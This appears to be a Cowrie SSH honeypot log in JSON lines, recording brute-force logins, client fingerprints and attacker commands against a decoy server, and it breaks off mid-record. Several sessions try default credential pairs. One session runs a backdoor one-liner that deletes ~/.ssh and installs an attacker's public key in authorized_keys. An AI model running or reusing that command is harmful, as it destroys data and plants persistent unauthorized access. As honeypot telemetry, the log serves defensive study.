{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":58248,"dst_ip":"1.2.3.4","dst_port":22,"session":"8abd9955c2a7","protocol":"ssh","message":"New connection: 82.67.125.95:58248 (1.2.3.4:22) [session: 8abd9955c2a7]","sensor":"my-vps","timestamp":"2025-08-31T01:35:06.739178Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:35:06.740116Z","src_ip":"82.67.125.95","session":"8abd9955c2a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:35:06.776166Z","src_ip":"82.67.125.95","session":"8abd9955c2a7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:35:06.962897Z","src_ip":"82.67.125.95","session":"8abd9955c2a7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:35:07.606529Z","src_ip":"212.227.125.160","session":"1dfc5e5c9216"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:35:07.607191Z","src_ip":"212.227.125.160","session":"1dfc5e5c9216"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:35:08.001889Z","src_ip":"82.67.125.95","session":"8abd9955c2a7"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":58258,"dst_ip":"1.2.3.4","dst_port":22,"session":"be59a72ff9be","protocol":"ssh","message":"New connection: 82.67.125.95:58258 (1.2.3.4:22) [session: be59a72ff9be]","sensor":"my-vps","timestamp":"2025-08-31T01:35:08.036976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:35:08.037889Z","src_ip":"82.67.125.95","session":"be59a72ff9be"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:35:08.074020Z","src_ip":"82.67.125.95","session":"be59a72ff9be"}
{"eventid":"cowrie.login.failed","username":"developer","password":"welcome","message":"login attempt [developer/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T01:35:08.205765Z","src_ip":"212.227.125.160","session":"77523d0d9b2b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:35:08.258841Z","src_ip":"82.67.125.95","session":"be59a72ff9be"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:35:08.295591Z","src_ip":"82.67.125.95","session":"67347db6786c"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:35:08.297278Z","src_ip":"82.67.125.95","session":"be59a72ff9be"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:35:09.747580Z","src_ip":"212.227.125.160","session":"77523d0d9b2b"}
{"eventid":"cowrie.login.success","username":"root","password":"asvv30","message":"login attempt [root/asvv30] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:35:13.640414Z","src_ip":"212.227.125.160","session":"1dfc5e5c9216"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:35:15.715493Z","src_ip":"212.227.125.160","session":"1dfc5e5c9216"}
{"eventid":"cowrie.command.input","input":"ssh -V","message":"CMD: ssh -V","sensor":"my-vps","timestamp":"2025-08-31T01:35:15.716157Z","src_ip":"212.227.125.160","session":"1dfc5e5c9216"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","size":58,"shasum":"8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:35:16.669457Z","src_ip":"212.227.125.160","session":"1dfc5e5c9216"}
{"eventid":"cowrie.session.closed","duration":"10.1","message":"Connection lost after 10.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:35:16.708851Z","src_ip":"212.227.125.160","session":"1dfc5e5c9216"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":17228,"dst_ip":"1.2.3.4","dst_port":22,"session":"03798e1abbf4","protocol":"ssh","message":"New connection: 102.88.137.80:17228 (1.2.3.4:22) [session: 03798e1abbf4]","sensor":"my-vps","timestamp":"2025-08-31T01:35:25.442763Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:35:25.443787Z","src_ip":"102.88.137.80","session":"03798e1abbf4"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:35:25.573149Z","src_ip":"102.88.137.80","session":"03798e1abbf4"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":60122,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b7167e72d18","protocol":"ssh","message":"New connection: 201.148.180.50:60122 (1.2.3.4:22) [session: 6b7167e72d18]","sensor":"my-vps","timestamp":"2025-08-31T01:35:25.770943Z"}
{"eventid":"cowrie.login.success","username":"root","password":"qweasd123.","message":"login attempt [root/qweasd123.] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:35:26.132666Z","src_ip":"102.88.137.80","session":"03798e1abbf4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:35:26.822203Z","src_ip":"102.88.137.80","session":"03798e1abbf4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:35:26.822909Z","src_ip":"102.88.137.80","session":"03798e1abbf4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:35:26.823994Z","src_ip":"102.88.137.80","session":"03798e1abbf4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:35:26.954621Z","src_ip":"102.88.137.80","session":"03798e1abbf4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:35:27.018179Z","src_ip":"201.148.180.50","session":"6b7167e72d18"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:35:27.018881Z","src_ip":"201.148.180.50","session":"6b7167e72d18"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:35:27.234882Z","src_ip":"102.88.137.80","session":"03798e1abbf4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:35:27.235562Z","src_ip":"102.88.137.80","session":"03798e1abbf4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:35:27.367274Z","src_ip":"102.88.137.80","session":"03798e1abbf4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:35:27.368176Z","src_ip":"102.88.137.80","session":"03798e1abbf4"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":17229,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0c88b89ff38","protocol":"ssh","message":"New connection: 102.88.137.80:17229 (1.2.3.4:22) [session: f0c88b89ff38]","sensor":"my-vps","timestamp":"2025-08-31T01:35:27.482570Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:35:27.483584Z","src_ip":"102.88.137.80","session":"f0c88b89ff38"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:35:27.606218Z","src_ip":"102.88.137.80","session":"f0c88b89ff38"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:35:28.137522Z","src_ip":"102.88.137.80","session":"f0c88b89ff38"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:35:29.268486Z","src_ip":"102.88.137.80","session":"f0c88b89ff38"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":33601,"dst_ip":"1.2.3.4","dst_port":22,"session":"072019937713","protocol":"ssh","message":"New connection: 102.88.137.80:33601 (1.2.3.4:22) [session: 072019937713]","sensor":"my-vps","timestamp":"2025-08-31T01:35:29.390458Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:35:29.391227Z","src_ip":"102.88.137.80","session":"072019937713"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:35:29.514169Z","src_ip":"102.88.137.80","session":"072019937713"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:35:30.045131Z","src_ip":"102.88.137.80","session":"072019937713"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:35:30.184299Z","src_ip":"102.88.137.80","session":"072019937713"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:35:30.190736Z","src_ip":"102.88.137.80","session":"03798e1abbf4"}
{"eventid":"cowrie.login.success","username":"root","password":"asvv30","message":"login attempt [root/asvv30] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:35:35.512383Z","src_ip":"201.148.180.50","session":"6b7167e72d18"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:35:38.937254Z","src_ip":"201.148.180.50","session":"6b7167e72d18"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-31T01:35:38.938106Z","src_ip":"201.148.180.50","session":"6b7167e72d18"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:35:40.345043Z","src_ip":"201.148.180.50","session":"6b7167e72d18"}
{"eventid":"cowrie.session.closed","duration":"14.6","message":"Connection lost after 14.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:35:40.346184Z","src_ip":"201.148.180.50","session":"6b7167e72d18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52216,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e0fdfc4ed74","protocol":"ssh","message":"New connection: 212.227.235.229:52216 (1.2.3.4:22) [session: 0e0fdfc4ed74]","sensor":"my-vps","timestamp":"2025-08-31T01:35:43.264111Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:35:44.024935Z","src_ip":"212.227.235.229","session":"0e0fdfc4ed74"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS